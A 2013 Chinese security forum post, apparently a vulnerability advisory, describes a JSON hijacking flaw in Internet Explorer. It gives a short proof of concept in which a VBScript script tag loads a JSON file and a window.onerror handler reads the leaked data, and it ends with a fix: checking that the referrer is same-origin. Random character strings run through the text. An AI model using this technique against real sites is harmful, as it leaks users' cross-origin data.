找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1947|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:5 q- h% r! Y8 `/ U7 O
+ ]7 a6 ]) N( l
由于某些资源容器对数据处理不当导致json劫持漏洞.: l, `7 D  j9 Y8 Z3 F3 r) p
详细说明:, d1 f/ B& [/ _- t2 ?3 `0 M
由于ie支持vbscript,所以script元素可以指定成vbscript语言:8 E% E8 g/ t! Y2 K, D
<script language=vbscript></script>1 U7 y- P$ ^3 [$ z! z: ^9 |

- T5 L8 X6 T% W- L' H9 O当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.% U% D5 e& D0 v
漏洞证明:
% N& n, W& v/ h' r3 ^* b<script>. F, X7 X; J! j; |' D) x
window.onerror=function(_){0 g" Q0 C3 ~0 o3 ~+ U4 w1 [7 \/ h
alert(_)
. |& p. s# C) ?5 `6 C) \! t}( t- p$ e9 T1 j0 Y
</script>! F" \1 x: w2 I3 P! u/ }1 i/ W* L6 C
<script language=vbscript src=1.json></script>3 K, I: ?9 Z# O8 w1 p9 c
1 T( r$ W" e3 x0 B

* ~8 u( E" M: |9 j1.json:) v+ p) V- `, z1 y/ e) Y4 V- C# B
[{"name":"sogili","age":19}]
9 _/ D7 z4 a" S  c修复方案:# h, J* m( k5 @7 Z6 M  I
网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表